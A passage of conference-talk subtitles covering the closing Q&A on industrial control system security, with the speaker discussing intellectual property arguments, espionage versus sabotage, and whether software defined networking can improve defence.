I was fucking crazy right. Stuxnet,
career. It's wrong. It's really wrong. But
648
00:55:34,309 --> 00:55:39,579
the point is I tried to take that
approach. I tried to say you have a
649
00:55:39,579 --> 00:55:43,019
process in which you manufacture something
and you make money by the fact that that
650
00:55:43,019 --> 00:55:47,979
process is relatively secret and if you
don't care about defending your workers
651
00:55:47,979 --> 00:55:52,589
from being damaged then at least care
about the intellectual property because
652
00:55:52,589 --> 00:55:56,059
I'll get security in by some sort of back
door right. I'm a little bit of a security
653
00:55:56,059 --> 00:56:00,200
Machiavellian. I'll find a way to get
security into the system somehow. So I
654
00:56:00,200 --> 00:56:05,349
tried to say intellectual property you
should be protected. And I found that they
655
00:56:05,349 --> 00:56:09,320
didn't care so much. I mean maybe you'll
have more luck maybe post-stuxnet that
656
00:56:09,320 --> 00:56:14,069
that's a better argument. I hope you do.
But it is an important question as well.
657
00:56:14,069 --> 00:56:18,719
Right. It's not, it's not just potential
for damage. I think there's a lot more
658
00:56:18,719 --> 00:56:25,459
espionage going on on these networks than
there is damage and sabotage. Herald: Okay
659
00:56:25,459 --> 00:56:32,069
we'll take one more question on mike four.
Questioner: Thank you okay. My question
660
00:56:32,069 --> 00:56:38,319
concerns the concepts of software defined
networking and open flow. So when I first
661
00:56:38,319 --> 00:56:44,880
heard about software defined networking I
thought well this is a huge security issue
662
00:56:44,880 --> 00:56:50,589
and there may be huge vulnerabilities.
After your joke I think this might
663
00:56:50,589 --> 00:56:56,420
actually be a good idea to dumb down the
switches and put the intelligence
664
00:56:56,420 --> 00:57:01,900
somewhere locked up in a safe place.
What's your opinion on that. Can they
665
00:57:01,900 --> 00:57:05,839
actually improve security.
Éireann: Yes. So the question is what role
666
00:57:05,839 --> 00:57:09,969
could software defined networking play in
these sorts of environments. And is it a
667
00:57:09,969 --> 00:57:15,210
good idea from a security perspective.
Anytime someone has a revolution in
668
00:57:15,210 --> 00:57:19,240
computing we also have to update our
security paradigm. So I think with
669
00:57:19,240 --> 00:57:23,039
software defined networking it's not
whether it's good or bad it's that you
670
00:57:23,039 --> 00:57:28,339
defend that network differently than you
defend one of these networks. So it's not
671
00:57:28,339 --> 00:57:31,400
so much that as good as good or bad it's
neutral if you know how to defend your
672
00:57:31,400 --> 00:57:34,779
network. I don't care what it is. As long
as someone is looking to defend it and
673
00:57:34,779 --> 00:57:38,989
cares about how the flows are working. So
I think software defined networking in
674
00:57:38,989 --> 00:57:42,449
these environments could be a very good
thing but the refresh rate on these
675
00:57:42,449 --> 00:57:45,799
devices is not that high. So I don't think
we'll see it there for a little while even
676
00:57:45,799 --> 00:57:50,859
though it might be a good thing
philosophically. It takes 5 10 15 20 years
677
00:57:50,859 --> 00:57:56,410
to refresh these networks so it'll be a little
while. But it's not good or bad. It's just
678
00:57:56,410 --> 00:57:59,909
learn to defend what you got is the
problem right.
679
00:57:59,909 --> 00:58:06,489
Questioner: Okay thanks a lot.
Herald: Okay okay let's give a big hand
680
00:58:06,489 --> 00:58:09,639
for Éireann and thank you.
Éireann: Thank you
681
00:58:09,639 --> 00:58:13,320
applause
682
00:58:13,320 --> 00:58:24,000
subtitles created by c3subtitles.de
Join, and help us!